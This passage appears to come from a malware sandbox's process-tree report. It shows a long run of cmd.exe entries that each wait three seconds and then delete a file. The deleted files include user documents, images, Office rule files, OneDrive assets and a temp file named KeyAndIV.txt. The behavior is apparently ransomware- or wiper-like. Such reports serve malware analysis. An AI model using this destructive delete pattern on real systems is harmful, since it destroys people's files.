      PID:4556
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1720
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log"
      4⤵
      PID:756
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3868
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log"
      4⤵
      PID:4024
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4968
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log"
      4⤵
      PID:1212
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2692
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log"
      4⤵
      PID:3604
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3496
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log"
      4⤵
      PID:3512
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4468
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log"
      4⤵
      PID:3988
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1880
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_001_vcRuntimeAdditional_x86.log"
      4⤵
      PID:4684
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3560
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log"
      4⤵
      PID:2660
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2284
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log"
      4⤵
      PID:4580
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3864
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_000_vcRuntimeMinimum_x86.log"
      4⤵
      PID:3708
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4148
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_001_vcRuntimeAdditional_x86.log"
      4⤵
      PID:2304
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4476
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\FindPing.xlsx"
      4⤵
      PID:2252
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13324
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\OptimizeExport.bmp"
      4⤵
      PID:1312
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13144
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\RestoreCopy.doc"
      4⤵
      PID:2208
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13332
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\StopSkip.asp"
      4⤵
      PID:612
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13480
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\AddPing.pptx"
      4⤵
      PID:4892
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13348
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Are.docx"
      4⤵
      PID:3532
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13364
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Files.docx"
      4⤵
      PID:3312
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13356
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Opened.docx"
      4⤵
      PID:4984
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13372
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Recently.docx"
      4⤵
      PID:4956
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13340
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\These.docx"
      4⤵
      PID:2040
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13496
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\UnblockSkip.xlsx"
      4⤵
      PID:4924
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13488
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\UnprotectMerge.xls"
      4⤵
      PID:3260
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14004
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\WatchGet.ppt"
      4⤵
      PID:3328
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14020
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\WatchSave.pdf"
      4⤵
      PID:4660
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14036
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\ClearProtect.ppt"
      4⤵
      PID:2484
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14012
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\DisableResume.odt"
      4⤵
      PID:1456
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14096
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\FormatSave.odt"
      4⤵
      PID:336
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14104
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\InstallFind.docx"
      4⤵
      PID:4164
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13964
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\MountRepair.xml"
      4⤵
      PID:1828
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14028
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\ResolveRegister.xlsx"
      4⤵
      PID:1260
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14220
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\StepMove.xls"
      4⤵
      PID:1176
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14320
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\WaitNew.xml"
      4⤵
      PID:1184
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14048
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Desktop.lnk"
      4⤵
      PID:776
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13980
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Downloads.lnk"
      4⤵
      PID:2028
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14212
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\ConvertStep.jpg"
      4⤵
      PID:3640
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14312
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\MountGrant.png"
      4⤵
      PID:3416
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:13988
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Music\SuspendReceive.jpg"
      4⤵
      PID:700
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2748
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\My Wallpaper.jpg"
      4⤵
      PID:4904
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14056
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\EnableEnter.txt"
      4⤵
      PID:968
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1536
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\HideGroup.docx"
      4⤵
      PID:1816
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14204
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\OpenAssert.xlsx"
      4⤵
      PID:4344
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1764
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1714135623.txt"
      4⤵
      PID:3464
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14556
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"
      4⤵
      PID:4340
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14484
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI4767.txt"
      4⤵
      PID:1140
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2300
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI4785.txt"
      4⤵
      PID:400
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14408
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI4767.txt"
      4⤵
      PID:3152
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14084
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI4785.txt"
      4⤵
      PID:3348
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4928
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\jawshtml.html"
      4⤵
      PID:1084
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1036
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\KeyAndIV.txt"
      4⤵
      PID:1352
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3192
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240426_124244853.html"
      4⤵
      PID:2764
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1116
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp11subu.tmp.jpg"
      4⤵
      PID:5124
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14076
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"
      4⤵
      PID:5140
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14164
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml"
      4⤵
      PID:5156
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4276
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"
      4⤵
      PID:5172
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1072
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"
      4⤵
      PID:5184
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14064
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml"
      4⤵
      PID:5208
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2140
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml"
      4⤵
      PID:5240
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14732
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\msoia.exe_Rules.xml"
      4⤵
      PID:5264
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2660
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\office2016setup.exe_Rules.xml"
      4⤵
      PID:5284
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15608
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml"
      4⤵
      PID:5304
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4780
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml"
      4⤵
      PID:5324
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15352
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml"
      4⤵
      PID:5352
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15396
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\alertIcon.png"
      4⤵
      PID:5372
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15640
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppBlue.png"
      4⤵
      PID:5392
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:5116
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png"
      4⤵
      PID:5424
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15920
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png"
      4⤵
      PID:5440
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:684
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png"
      4⤵
      PID:5456
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:624
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.png"
      4⤵
      PID:5480
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3824
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png"
      4⤵
      PID:5500
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15540
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppWhite.png"
      4⤵
      PID:5532
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4464
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Error.png"
      4⤵
      PID:5556
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14772
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ErrorPage.html"
      4⤵
      PID:5568
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14516
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png"
      4⤵
      PID:5580
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14116
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMLockedFileToast.png"
      4⤵
      PID:5600
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14296
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMScanExclusionToast.png"
      4⤵
      PID:5660
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:16380
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoadingPage.html"
      4⤵
      PID:5692
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:932
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png"
      4⤵
      PID:5712
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3488
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png"
      4⤵
      PID:5728
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15288
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png"
      4⤵
      PID:5756
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14580
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaNearing.png"
      4⤵
      PID:5776
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14532
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\TestSharePage.html"
      4⤵
      PID:5792
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3552
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"
      4⤵
      PID:5824
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:3868
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Warning.png"
      4⤵
      PID:5844
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14548
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png"
      4⤵
      PID:5860
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:5104
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png"
      4⤵
      PID:5888
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14740
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png"
      4⤵
      PID:5904
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:4240
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png"
      4⤵
      PID:5932
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15484
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png"
      4⤵
      PID:5956
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14392
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png"
      4⤵
      PID:5972
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14260
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png"
      4⤵
      PID:5992
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:15312
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png"
      4⤵
      PID:6008
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14820
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png"
      4⤵
      PID:6032
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:14796
  - - C:\Windows\SYSTEM32\cmd.exe
